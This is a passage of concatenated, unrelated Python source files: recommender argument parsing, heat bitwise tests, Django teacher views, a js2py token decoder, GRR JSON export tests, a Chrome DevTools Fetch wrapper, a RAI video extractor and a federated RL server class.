ufo/loo/fo(split by ratio)/tfo/tloo') parser.add_argument('--val_method', type=str, default='tloo', help='validation method, options: cv, tfo, loo, tloo') parser.add_argument('--test_size', type=float, default=0.2, help='split ratio for test set') parser.add_argument('--val_size', type=float, default=0.1, help='split ratio for validation set') parser.add_argument('--fold_num', type=int, default=5, help='No. of folds for cross-validation') parser.add_argument('--cand_num', type=int, default=99, help='No. of candidates item for predict') parser.add_argument('--sample_method', type=str, default='uniform', help='negative sampling method mixed with uniform, options: item-ascd, item-desc') parser.add_argument('--sample_ratio', type=float, default=1, help='mix sample method ratio, 0 for all uniform') parser.add_argument('--init_method', type=str, default='', help='weight initialization method') parser.add_argument('--gpu', type=str, default='0', help='gpu card ID') parser.add_argument('--num_ng', type=int, default=4, help='negative sampling number') parser.add_argument('--loss_type', type=str, default='BPR', help='loss function type: BPR/CL') parser.add_argument('--optimizer', type=str, default='adam', help='type of optimizer: SGD /adam') # algo settings parser.add_argument('--factors', type=int, default=64, help='latent factors numbers in the model') parser.add_argument('--reg_1', type=float, # default=0.001, default=0, help='L1 regularization') parser.add_argument('--reg_2', type=float, # default=0.001, default=0.01, help='L2 regularization') parser.add_argument('--dropout', # type=float, default=0.5, help='dropout rate') parser.add_argument('--lr', default=0.005, help='learning rate') # parser.add_argument('--lr', # type=float, # default=0.001, # help='learning rate') parser.add_argument('--epochs', type=int, default=50, help='training epochs') parser.add_argument("--num_workers", type=int, default=16, help='num_workers') parser.add_argument('--batch_size', default=512, help='batch size for training') # parser.add_argument('--batch_size', # type=int, # default=256, # help='batch size for training') parser.add_argument('--num_layers', type=int, default=1, help='number of layers in MLP model') parser.add_argument('--max_evals', type=int, default=10, help='number of trials TUNE') parser.add_argument('--num_heads', type=int, default=1, help='number of multi-head attention GAT') parser.add_argument('--act_func', type=str, default='relu', help='activation method in interio layers') parser.add_argument('--out_func', type=str, default='sigmoid', help='activation method in output layers') parser.add_argument('--no_batch_norm', action='store_false', default=True, help='whether do batch normalization in interior layers') args = parser.parse_args() return args
import unittest import torch import os import heat as ht from .test_suites.basic_test import TestCase class TestOperations(TestCase): def test___binary_bit_op_broadcast(self): # broadcast without split left_tensor = ht.ones((4, 1), dtype=ht.int32) right_tensor = ht.ones((1, 2), dtype=ht.int32) result = left_tensor & right_tensor self.assertEqual(result.shape, (4, 2)) result = right_tensor & left_tensor self.assertEqual(result.shape, (4, 2)) # broadcast with split=0 for both operants left_tensor = ht.ones((4, 1), split=0, dtype=ht.int32) right_tensor = ht.ones((1, 2), split=0, dtype=ht.int32) result = left_tensor | right_tensor self.assertEqual(result.shape, (4, 2)) result = right_tensor | left_tensor self.assertEqual(result.shape, (4, 2)) # broadcast with split=1 for both operants left_tensor = ht.ones((4, 1), split=1, dtype=ht.int32) right_tensor = ht.ones((1, 2), split=1, dtype=ht.int32) result = left_tensor ^ right_tensor self.assertEqual(result.shape, (4, 2)) result = right_tensor ^ left_tensor self.assertEqual(result.shape, (4, 2)) # broadcast with split=1 for second operant left_tensor = ht.ones((4, 1), dtype=ht.int32) right_tensor = ht.ones((1, 2), split=1, dtype=ht.int32) result = left_tensor & right_tensor self.assertEqual(result.shape, (4, 2)) result = right_tensor & left_tensor self.assertEqual(result.shape, (4, 2)) # broadcast with split=0 for first operant left_tensor = ht.ones((4, 1), split=0, dtype=ht.int32) right_tensor = ht.ones((1, 2), dtype=ht.int32) result = left_tensor | right_tensor self.assertEqual(result.shape, (4, 2)) result = right_tensor | left_tensor self.assertEqual(result.shape, (4, 2)) # broadcast with unequal dimensions and one splitted tensor left_tensor = ht.ones((2, 4, 1), split=0, dtype=ht.int32) right_tensor = ht.ones((1, 2), dtype=ht.int32) result = left_tensor ^ right_tensor self.assertEqual(result.shape, (2, 4, 2)) result = right_tensor ^ left_tensor self.assertEqual(result.shape, (2, 4, 2)) # broadcast with unequal dimensions, a scalar, and one splitted tensor left_scalar = ht.np.int32(1) right_tensor = ht.ones((1, 2), split=0, dtype=ht.int32) result = ht.bitwise_or(left_scalar, right_tensor) self.assertEqual(result.shape, (1, 2)) result = right_tensor | left_scalar self.assertEqual(result.shape, (1, 2)) # broadcast with unequal dimensions and two splitted tensors left_tensor = ht.ones((4, 1, 3, 1, 2), split=0, dtype=torch.uint8) right_tensor = ht.ones((1, 3, 1), split=0, dtype=torch.uint8) result = left_tensor & right_tensor self.assertEqual(result.shape, (4, 1, 3, 3, 2)) result = right_tensor & left_tensor self.assertEqual(result.shape, (4, 1, 3, 3, 2)) with self.assertRaises(TypeError): ht.bitwise_and(ht.ones((1, 2)), "wrong type") with self.assertRaises(NotImplementedError): ht.bitwise_or( ht.ones((1, 2), dtype=ht.int32, split=0), ht.ones((1, 2), dtype=ht.int32, split=1) )
<filename>day_ok/schedule/views/teachers.py from typing import Dict, Any from django.shortcuts import render, redirect, Http404 from django.http import HttpRequest from django.forms.models import model_to_dict from ..middleware import authenticated from ..forms.teachers import ( TeacherLessonsColorForm, TeacherForm, ) from ..bl.teachers import ( teachers_objects, get_teacher, get_teacher_lessons_info, set_teacher_lessons_color, add_teacher, edit_teacher, prepare_date_fields, delete_teacher, unpin_teacher_subject, get_lessons_by_year_and_month, get_weekly_lessons_by_year_and_month, ) from ..utils import ( is_valid_period_format, create_datetime_start_from_period, create_datetime_end_period, get_year_month_periods, get_period, datetime_now_tz, create_datetime_start_period, ) @authenticated def teachers(request: HttpRequest, *args, **kwargs): context: Dict[Any, Any] = {} def _view(): context.update(teachers=teachers_objects()) context.update(form=TeacherForm()) def _add(): form = TeacherForm(request.POST) if form.is_valid(): add_teacher(**form.cleaned_data) else: context.update(errors=form.errors) if request.method == 'POST': _add() _view() return render(request, 'schedule/teachers/base.html', context) @authenticated def teachers_view(request: HttpRequest, teacher_id: int): dt_now = datetime_now_tz() dt_start_period = create_datetime_start_period(dt_now) dt_end_period = create_datetime_end_period(dt_start_period) default_period = get_period(dt_now.year, dt_now.month) ctx: Dict[Any, Any] = { 'periods': get_year_month_periods(), 'selected_period': default_period, } template_name = 'schedule/teachers/view.html' def _edit(): form = TeacherForm(request.POST) if form.is_valid(): if not get_teacher(teacher_id): raise Http404("Викладач не існує") _teacher = edit_teacher( teacher_id, **form.cleaned_data, ) _view() def _view(): period = request.GET.get('period') dt_start, dt_end = None, None if period and is_valid_period_format(period): dt_start = create_datetime_start_from_period(period) dt_end = create_datetime_end_period(dt_start) ctx.update(selected_period=period) ctx.update( lessons_reports=get_teacher_lessons_info( teacher_id, dt_start or dt_start_period, dt_end or dt_end_period ) ) teacher = get_teacher(teacher_id) if not teacher: raise Http404("Викладач не існує") year = (dt_start or dt_start_period).year month = (dt_start or dt_start_period).month ctx.update(lessons_calendar=list(get_weekly_lessons_by_year_and_month( teacher, year, month, ))) data = model_to_dict(teacher) prepare_date_fields(data) ctx.update(teacher=teacher) ctx.update(form=TeacherForm(data=data)) if request.method == 'POST': _edit() elif request.method == 'GET': if res := _view(): return res else: return redirect('teachers') return render(request, template_name, ctx) @authenticated def set_teacher_lessons_style(request: HttpRequest, teacher_id: int): if request.method == 'POST': form = TeacherLessonsColorForm(request.POST) if form.is_valid(): _teacher = set_teacher_lessons_color( teacher_id, **form.cleaned_data, ) return redirect('teachers_actions', teacher_id) @authenticated def teacher_delete(request: HttpRequest, teacher_id: int): if request.method == 'POST': delete_teacher(teacher_id) return redirect('teachers') @authenticated def unpin_subject(request: HttpRequest, teacher_id: int): if request.method == 'POST': unpin_teacher_subject( teacher_id, request.POST.get('subject_id', -1), ) return redirect('teachers_actions', teacher_id)
<filename>anime_downloader/extractors/kwik_token_extractor.py from js2py.pyjs import * # setting scope var = Scope(JS_BUILTINS) set_global_object(var) # Code follows: var.registers(['extract_data', '_0xe12c']) @Js def PyJsHoisted__0xe12c_(d, e, f, this, arguments, var=var): var = Scope({'d': d, 'e': e, 'f': f, 'this': this, 'arguments': arguments}, var) var.registers(['e', 'i', 'h', 'g', 'k', 'd', 'j', 'f']) var.put('g', Js('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/').callprop('split', Js(''))) var.put('h', var.get('g').callprop('slice', Js(0.0), var.get('e'))) var.put('i', var.get('g').callprop('slice', Js(0.0), var.get('f'))) @Js def PyJs_anonymous_0_(a, b, c, this, arguments, var=var): var = Scope({'a': a, 'b': b, 'c': c, 'this': this, 'arguments': arguments}, var) var.registers(['b', 'c', 'a']) if PyJsStrictNeq(var.get('h').callprop('indexOf', var.get('b')), (-Js(1.0))): return var.put('a', ( var.get('h').callprop('indexOf', var.get('b')) * var.get('Math').callprop('pow', var.get('e'), var.get('c'))), '+') PyJs_anonymous_0_._set_name('anonymous') var.put('j', var.get('d').callprop('split', Js('')).callprop('reverse').callprop('reduce', PyJs_anonymous_0_, Js(0.0))) var.put('k', Js('')) while (var.get('j') > Js(0.0)): var.put('k', (var.get('i').get((var.get('j') % var.get('f'))) + var.get('k'))) var.put('j', ((var.get('j') - (var.get('j') % var.get('f'))) / var.get('f'))) return (var.get('k') or Js('0')) PyJsHoisted__0xe12c_.func_name = '_0xe12c' var.put('_0xe12c', PyJsHoisted__0xe12c_) @Js def PyJsHoisted_extract_data_(h, u, n, t, e, r, this, arguments, var=var): var = Scope({'h': h, 'u': u, 'n': n, 't': t, 'e': e, 'r': r, 'this': this, 'arguments': arguments}, var) var.registers(['e', 'len', 'i', 'h', 'u', 'n', 'r', 's', 't', 'j']) var.put('r', Js('')) # for JS loop var.put('i', Js(0.0)) var.put('len', var.get('h').get('length')) while (var.get('i') < var.get('len')): try: var.put('s', Js('')) while PyJsStrictNeq(var.get('h').get(var.get('i')), var.get('n').get(var.get('e'))): var.put('s', var.get('h').get(var.get('i')), '+') (var.put('i', Js(var.get('i').to_number()) + Js(1)) - Js(1)) # for JS loop var.put('j', Js(0.0)) while (var.get('j') < var.get('n').get('length')): try: var.put('s', var.get('s').callprop('replace', var.get('RegExp').create(var.get('n').get(var.get('j')), Js('g')), var.get('j'))) finally: (var.put('j', Js(var.get('j').to_number()) + Js(1)) - Js(1)) var.put('r', var.get('String').callprop('fromCharCode', ( var.get('_0xe12c')(var.get('s'), var.get('e'), Js(10.0)) - var.get('t'))), '+') finally: (var.put('i', Js(var.get('i').to_number()) + Js(1)) - Js(1)) return var.get('decodeURIComponent')(var.get('escape')(var.get('r'))) PyJsHoisted_extract_data_.func_name = 'extract_data' var.put('extract_data', PyJsHoisted_extract_data_) kwik_token_extractor = var.to_python()
<reponame>raydan4/grr # Lint as: python3 # -*- encoding: utf-8 -*- """Tests for JSON instant output plugin.""" import os import zipfile from absl import app import json from grr_response_core.lib.rdfvalues import client as rdf_client from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs from grr_response_core.lib.rdfvalues import paths as rdf_paths from grr_response_server.output_plugins import test_plugins from grr_response_server.output_plugins import json_plugin from grr.test_lib import test_lib class JsonInstantOutputPluginTest(test_plugins.InstantOutputPluginTestBase): """Tests the JSON instant output plugin.""" plugin_cls = json_plugin.JsonInstantOutputPluginWithExportConversion def ProcessValuesToZip(self, values_by_cls): fd_path = self.ProcessValues(values_by_cls) file_basename, _ = os.path.splitext(os.path.basename(fd_path)) return zipfile.ZipFile(fd_path), file_basename def testJsonPluginWithValuesOfSametypes(self): responses = [] for i in range(10): responses.append( rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec( path="/foo/bar/%d" % i, pathtype="OS"), st_mode=33184, st_ino=1063090, st_dev=64512, st_nlink=1 + i, st_uid=139592, st_gid=5000, st_size=0, st_atime=1336469177, st_mtime=1336129892, st_ctime=1336129892)) zip_fd, prefix = self.ProcessValuesToZip( {rdf_client_fs.StatEntry: responses}) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix }) parsed_manifest = json.loads(zip_fd.read("%s/MANIFEST" % prefix)) self.assertEqual(parsed_manifest, {"export_stats": { "StatEntry": { "ExportedFile": 10 }}}) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 10) for i in range(10): self.assertEqual(parsed_output[i]["metadata"]["client_urn"], "aff4:/%s" % self.client_id) self.assertEqual(parsed_output[i]["metadata"]["source_urn"], str(self.results_urn)) self.assertEqual(parsed_output[i]["urn"], "aff4:/%s/fs/os/foo/bar/%d" % (self.client_id, i)) self.assertEqual(parsed_output[i]["st_mode"], "-rw-r-----") self.assertEqual(parsed_output[i]["st_ino"], "1063090") self.assertEqual(parsed_output[i]["st_dev"], "64512") self.assertEqual(parsed_output[i]["st_nlink"], str(1 + i)) self.assertEqual(parsed_output[i]["st_uid"], "139592") self.assertEqual(parsed_output[i]["st_gid"], "5000") self.assertEqual(parsed_output[i]["st_size"], "0") self.assertEqual(parsed_output[i]["st_atime"], "2012-05-08 09:26:17") self.assertEqual(parsed_output[i]["st_mtime"], "2012-05-04 11:11:32") self.assertEqual(parsed_output[i]["st_ctime"], "2012-05-04 11:11:32") self.assertEqual(parsed_output[i]["st_blksize"], "0") self.assertEqual(parsed_output[i]["st_rdev"], "0") self.assertEqual(parsed_output[i]["symlink"], "") def testJsonPluginWithValuesOfMultipleTypes(self): zip_fd, prefix = self.ProcessValuesToZip({ rdf_client_fs.StatEntry: [ rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec(path="/foo/bar", pathtype="OS")) ], rdf_client.Process: [rdf_client.Process(pid=42)] }) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix, "%s/ExportedProcess/from_Process.json" % prefix }) parsed_manifest = json.loads(zip_fd.read("%s/MANIFEST" % prefix)) self.assertEqual( parsed_manifest, { "export_stats": { "StatEntry": { "ExportedFile": 1 }, "Process": { "ExportedProcess": 1 } } }) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["metadata"]["client_urn"], "aff4:/%s" % self.client_id) self.assertEqual(parsed_output[0]["metadata"]["source_urn"], str(self.results_urn)) self.assertEqual(parsed_output[0]["urn"], "aff4:/%s/fs/os/foo/bar" % self.client_id) parsed_output = json.loads( zip_fd.read("%s/ExportedProcess/from_Process.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["pid"], "42") def testJsonPluginWritesUnicodeValuesCorrectly(self): zip_fd, prefix = self.ProcessValuesToZip({ rdf_client_fs.StatEntry: [ rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec(path="/中国新闻网新闻中", pathtype="OS")) ] }) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix }) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["urn"], "aff4:/%s/fs/os/中国新闻网新闻中" % self.client_id) def testJsonPluginWritesMoreThanOnePatchOfRowsCorrectly(self): num_rows = self.__class__.plugin_cls.ROW_BATCH * 2 + 1 responses = [] for i in range(num_rows): responses.append( rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec( path="/foo/bar/%d" %i, pathtype="OS"))) zip_fd, prefix = self.ProcessValuesToZip( {rdf_client_fs.StatEntry: responses}) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, num_rows) for i in range(num_rows): self.assertEqual(parsed_output[i]["urn"], "aff4:/%s/fs/os/foo/bar/%d" % (self.client_id, i)) def main(argv): test_lib.main(argv) if __name__ == "__main__": app.run(main)
<reponame>Phill240/chrome-remote-interface-py """This is an auto-generated file. Modify at your own risk""" from typing import Awaitable, Any, Callable, Dict, List, Optional, Union, TYPE_CHECKING if TYPE_CHECKING: from cripy import ConnectionType, SessionType __all__ = ["Fetch"] class Fetch: """ A domain for letting clients substitute browser's network layer with client code. Domain Dependencies: * Network * IO * Page Status: Experimental See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch` """ __slots__ = ["client"] def __init__(self, client: Union["ConnectionType", "SessionType"]) -> None: """Initialize a new instance of Fetch :param client: The client instance to be used to communicate with the remote browser instance """ self.client: Union["ConnectionType", "SessionType"] = client def disable(self) -> Awaitable[Dict]: """ Disables the fetch domain. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-disable` :return: The results of the command """ return self.client.send("Fetch.disable", {}) def enable( self, patterns: Optional[List[Dict[str, Any]]] = None, handleAuthRequests: Optional[bool] = None, ) -> Awaitable[Dict]: """ Enables issuing of requestPaused events. A request will be paused until client calls one of failRequest, fulfillRequest or continueRequest/continueWithAuth. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-enable` :param patterns: If specified, only requests matching any of these patterns will produce fetchRequested event and will be paused until clients response. If not set, all requests will be affected. :param handleAuthRequests: If true, authRequired events will be issued and requests will be paused expecting a call to continueWithAuth. :return: The results of the command """ msg = {} if patterns is not None: msg["patterns"] = patterns if handleAuthRequests is not None: msg["handleAuthRequests"] = handleAuthRequests return self.client.send("Fetch.enable", msg) def failRequest(self, requestId: str, errorReason: str) -> Awaitable[Dict]: """ Causes the request to fail with specified reason. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-failRequest` :param requestId: An id the client received in requestPaused event. :param errorReason: Causes the request to fail with the given reason. :return: The results of the command """ return self.client.send( "Fetch.failRequest", {"requestId": requestId, "errorReason": errorReason} ) def fulfillRequest( self, requestId: str, responseCode: int, responseHeaders: List[Dict[str, Any]], body: Optional[str] = None, responsePhrase: Optional[str] = None, ) -> Awaitable[Dict]: """ Provides response to the request. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-fulfillRequest` :param requestId: An id the client received in requestPaused event. :param responseCode: An HTTP response code. :param responseHeaders: Response headers. :param body: A response body. :param responsePhrase: A textual representation of responseCode. If absent, a standard phrase mathcing responseCode is used. :return: The results of the command """ msg = { "requestId": requestId, "responseCode": responseCode, "responseHeaders": responseHeaders, } if body is not None: msg["body"] = body if responsePhrase is not None: msg["responsePhrase"] = responsePhrase return self.client.send("Fetch.fulfillRequest", msg) def continueRequest( self, requestId: str, url: Optional[str] = None, method: Optional[str] = None, postData: Optional[str] = None, headers: Optional[List[Dict[str, Any]]] = None, ) -> Awaitable[Dict]: """ Continues the request, optionally modifying some of its parameters. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-continueRequest` :param requestId: An id the client received in requestPaused event. :param url: If set, the request url will be modified in a way that's not observable by page. :param method: If set, the request method is overridden. :param postData: If set, overrides the post data in the request. :param headers: If set, overrides the request headrts. :return: The results of the command """ msg = {"requestId": requestId} if url is not None: msg["url"] = url if method is not None: msg["method"] = method if postData is not None: msg["postData"] = postData if headers is not None: msg["headers"] = headers return self.client.send("Fetch.continueRequest", msg) def continueWithAuth( self, requestId: str, authChallengeResponse: Dict[str, Any] ) -> Awaitable[Dict]: """ Continues a request supplying authChallengeResponse following authRequired event. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-continueWithAuth` :param requestId: An id the client received in authRequired event. :param authChallengeResponse: Response to with an authChallenge. :return: The results of the command """ return self.client.send( "Fetch.continueWithAuth", {"requestId": requestId, "authChallengeResponse": authChallengeResponse}, ) def getResponseBody(self, requestId: str) -> Awaitable[Dict]: """ Causes the body of the response to be received from the server and returned as a single string. May only be issued for a request that is paused in the Response stage and is mutually exclusive with takeResponseBodyForInterceptionAsStream. Calling other methods that affect the request or disabling fetch domain before body is received results in an undefined behavior. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-getResponseBody` :param requestId: Identifier for the intercepted request to get body for. :return: The results of the command """ return self.client.send("Fetch.getResponseBody", {"requestId": requestId}) def takeResponseBodyAsStream(self, requestId: str) -> Awaitable[Dict]: """ Returns a handle to the stream representing the response body. The request must be paused in the HeadersReceived stage. Note that after this command the request can't be continued as is -- client either needs to cancel it or to provide the response body. The stream only supports sequential read, IO.read will fail if the position is specified. This method is mutually exclusive with getResponseBody. Calling other methods that affect the request or disabling fetch domain before body is received results in an undefined behavior. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-takeResponseBodyAsStream` :param requestId: The requestId :return: The results of the command """ return self.client.send( "Fetch.takeResponseBodyAsStream", {"requestId": requestId} ) def requestPaused( self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None ) -> Any: """ Issued when the domain is enabled and the request URL matches the specified filter. The request is paused until the client responds with one of continueRequest, failRequest or fulfillRequest. The stage of the request can be determined by presence of responseErrorReason and responseStatusCode -- the request is at the response stage if either of these fields is present and in the request stage otherwise. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#event-requestPaused` :param listener: Optional listener function :return: If a listener was supplied the return value is a callable that will remove the supplied listener otherwise a future that resolves with the value of the event """ event_name = "Fetch.requestPaused" if listener is None: future = self.client.loop.create_future() def _listener(event: Optional[Dict] = None) -> None: future.set_result(event) self.client.once(event_name, _listener) return future self.client.on(event_name, listener) return lambda: self.client.remove_listener(event_name, listener) def authRequired( self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None ) -> Any: """ Issued when the domain is enabled with handleAuthRequests set to true. The request is paused until client responds with continueWithAuth. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#event-authRequired` :param listener: Optional listener function :return: If a listener was supplied the return value is a callable that will remove the supplied listener otherwise a future that resolves with the value of the event """ event_name = "Fetch.authRequired" if listener is None: future = self.client.loop.create_future() def _listener(event: Optional[Dict] = None) -> None: future.set_result(event) self.client.once(event_name, _listener) return future self.client.on(event_name, listener) return lambda: self.client.remove_listener(event_name, listener)
from __future__ import unicode_literals import re from .common import InfoExtractor from ..compat import ( compat_urllib_parse, compat_urlparse, ) from ..utils import ( parse_duration, unified_strdate, ) class RaiIE(InfoExtractor): _VALID_URL = r'(?P<url>(?P<host>http://(?:.+?\.)?(?:rai\.it|rai\.tv|rainews\.it))/dl/.+?-(?P<id>[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})(?:-.+?)?\.html)' _TESTS = [ { 'url': 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-cb27157f-9dd0-4aee-b788-b1f67643a391.html', 'md5': 'c064c0b2d09c278fb293116ef5d0a32d', 'info_dict': { 'id': 'cb27157f-9dd0-4aee-b788-b1f67643a391', 'ext': 'mp4', 'title': 'Report del 07/04/2014', 'description': 'md5:f27c544694cacb46a078db84ec35d2d9', 'upload_date': '20140407', 'duration': 6160, } }, { 'url': 'http://www.raisport.rai.it/dl/raiSport/media/rassegna-stampa-04a9f4bd-b563-40cf-82a6-aad3529cb4a9.html', 'md5': '8bb9c151924ce241b74dd52ef29ceafa', 'info_dict': { 'id': '04a9f4bd-b563-40cf-82a6-aad3529cb4a9', 'ext': 'mp4', 'title': 'TG PRIMO TEMPO', 'description': '', 'upload_date': '20140612', 'duration': 1758, }, 'skip': 'Error 404', }, { 'url': 'http://www.rainews.it/dl/rainews/media/state-of-the-net-Antonella-La-Carpia-regole-virali-7aafdea9-0e5d-49d5-88a6-7e65da67ae13.html', 'md5': '35cf7c229f22eeef43e48b5cf923bef0', 'info_dict': { 'id': '7aafdea9-0e5d-49d5-88a6-7e65da67ae13', 'ext': 'mp4', 'title': 'State of the Net, Antonella La Carpia: regole virali', 'description': 'md5:b0ba04a324126903e3da7763272ae63c', 'upload_date': '20140613', }, 'skip': 'Error 404', }, { 'url': 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-b4a49761-e0cc-4b14-8736-2729f6f73132-tg2.html', 'md5': '35694f062977fe6619943f08ed935730', 'info_dict': { 'id': 'b4a49761-e0cc-4b14-8736-2729f6f73132', 'ext': 'mp4', 'title': 'Alluvione in Sardegna e dissesto idrogeologico', 'description': 'Edizione delle ore 20:30 ', } }, { 'url': 'http://www.ilcandidato.rai.it/dl/ray/media/Il-Candidato---Primo-episodio-Le-Primarie-28e5525a-b495-45e8-a7c3-bc48ba45d2b6.html', 'md5': '02b64456f7cc09f96ff14e7dd489017e', 'info_dict': { 'id': '28e5525a-b495-45e8-a7c3-bc48ba45d2b6', 'ext': 'flv', 'title': 'Il Candidato - Primo episodio: "Le Primarie"', 'description': 'Primo appuntamento con "Il candidato" con <NAME>, alias <NAME> presidente!', 'uploader': 'RaiTre', } }, { 'url': 'http://www.report.rai.it/dl/Report/puntata/ContentItem-0c7a664b-d0f4-4b2c-8835-3f82e46f433e.html', 'md5': '037104d2c14132887e5e4cf114569214', 'info_dict': { 'id': '0c7a664b-d0f4-4b2c-8835-3f82e46f433e', 'ext': 'flv', 'title': 'Il pacco', 'description': 'md5:4b1afae1364115ce5d78ed83cd2e5b3a', 'uploader': 'RaiTre', 'upload_date': '20141221', }, } ] def _extract_relinker_url(self, webpage): return self._proto_relative_url(self._search_regex( [r'name="videourl" content="([^"]+)"', r'var\s+videoURL(?:_MP4)?\s*=\s*"([^"]+)"'], webpage, 'relinker url', default=None)) def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') host = mobj.group('host') webpage = self._download_webpage(url, video_id) relinker_url = self._extract_relinker_url(webpage) if not relinker_url: iframe_url = self._search_regex( [r'<iframe[^>]+src="([^"]*/dl/[^"]+\?iframe\b[^"]*)"', r'drawMediaRaiTV\(["\'](.+?)["\']'], webpage, 'iframe') if not iframe_url.startswith('http'): iframe_url = compat_urlparse.urljoin(url, iframe_url) webpage = self._download_webpage( iframe_url, video_id) relinker_url = self._extract_relinker_url(webpage) relinker = self._download_json( '%s&output=47' % relinker_url, video_id) media_url = relinker['video'][0] ct = relinker.get('ct') if ct == 'f4m': formats = self._extract_f4m_formats( media_url + '&hdcore=3.7.0&plugin=aasp-3.7.0.39.44', video_id) else: formats = [{ 'url': media_url, 'format_id': ct, }] json_link = self._html_search_meta( 'jsonlink', webpage, 'JSON link', default=None) if json_link: media = self._download_json( host + json_link, video_id, 'Downloading video JSON') title = media.get('name') description = media.get('desc') thumbnail = media.get('image_300') or media.get('image_medium') or media.get('image') duration = parse_duration(media.get('length')) uploader = media.get('author') upload_date = unified_strdate(media.get('date')) else: title = (self._search_regex( r'var\s+videoTitolo\s*=\s*"(.+?)";', webpage, 'title', default=None) or self._og_search_title(webpage)).replace('\\"', '"') description = self._og_search_description(webpage) thumbnail = self._og_search_thumbnail(webpage) duration = None uploader = self._html_search_meta('Editore', webpage, 'uploader') upload_date = unified_strdate(self._html_search_meta( 'item-date', webpage, 'upload date', default=None)) subtitles = self.extract_subtitles(video_id, webpage) return { 'id': video_id, 'title': title, 'description': description, 'thumbnail': thumbnail, 'uploader': uploader, 'upload_date': upload_date, 'duration': duration, 'formats': formats, 'subtitles': subtitles, } def _get_subtitles(self, video_id, webpage): subtitles = {} m = re.search(r'<meta name="closedcaption" content="(?P<captions>[^"]+)"', webpage) if m: captions = m.group('captions') STL_EXT = '.stl' SRT_EXT = '.srt' if captions.endswith(STL_EXT): captions = captions[:-len(STL_EXT)] + SRT_EXT subtitles['it'] = [{ 'ext': 'srt', 'url': 'http://www.rai.tv%s' % compat_urllib_parse.quote(captions), }] return subtitles
<reponame>Emilie-Thome/Multi-Agent-RL import numpy as np import random import sys from rllab.misc import logger from rllab.misc.overrides import overrides from rllab.algos.batch_polopt import BatchPolopt from rllab.algos.agent import Agent from rllab.optimizers.first_order_optimizer import FirstOrderOptimizer from rllab.core.serializable import Serializable class Server(BatchPolopt, Serializable): def __init__(self, agents_number, average_period, participation_rate, env, policy, baseline, difference_params=False, quantize=False, quantization_tuning=4, optimizer=None, optimizer_args=None, **kwargs): Serializable.quick_init(self, locals()) if optimizer is None: default_args = dict( batch_size=None, max_epochs=1, ) if optimizer_args is None: optimizer_args = default_args else: optimizer_args = dict(default_args, **optimizer_args) optimizer = [FirstOrderOptimizer(**optimizer_args)] * agents_number self.agents = [Agent(env=env, policy=policy, optimizer=optimizer, baseline=baseline, difference_params=difference_params, quantize=quantize, quantization_tuning=quantization_tuning, **kwargs) for optimizer in optimizer] self.baseline = baseline self.average_period = average_period self.participation_rate = participation_rate self.transferred_bits = 0 super(Server, self).__init__(agents_number=agents_number, average_period=average_period, participation_rate=participation_rate, env=env, policy=policy, baseline=baseline, difference_params=difference_params, quantize=quantize, quantization_tuning=quantization_tuning, optimizer=optimizer, optimizer_args=optimizer_args, **kwargs) @overrides def start_worker(self): for agent in self.agents: agent.start_worker() @overrides def shutdown_worker(self): for agent in self.agents: agent.shutdown_worker() @overrides def init_opt(self): for agent in self.agents: agent.init_opt() def obtain_samples(self, itr): paths_n = [] for agent in self.agents: paths_n.append(agent.sampler.obtain_samples(itr)) return paths_n def process_samples(self, itr, paths_n): samples_data_n = [] for paths, agent in zip(paths_n, self.agents): samples_data_n.append(agent.sampler.process_samples(itr, paths)) return samples_data_n @overrides def log_diagnostics(self, paths_n): for paths, agent in zip(paths_n, self.agents): agent.log_diagnostics(paths) def optimize_agents_policies(self, itr, samples_data_n): for samples_data, agent in zip(samples_data_n, self.agents): agent.optimize_policy(itr, samples_data) def generate_participants(self): agents = self.agents nb_participants = int(self.participation_rate*len(agents)) participants = set() while len(participants) != nb_participants: participants.update({agents[random.randrange(len(agents))]}) return participants def collect_delta_policy_params(self, participants): return [agent.transmit_server() for agent in participants] @overrides def optimize_policy(self): participants = self.generate_participants() delta_policy_params_n = self.collect_delta_policy_params(participants) for k, agent in enumerate(participants): self.transferred_bits += sys.getsizeof(delta_policy_params_n[k]) delta_policy_params_mean = np.average(delta_policy_params_n, axis=0) for agent in self.agents: agent.server_update_mean_policy(delta_policy_params_mean) if agent in participants: agent.server_update_policy() @overrides def get_itr_snapshot(self, itr): return dict( itr=itr, 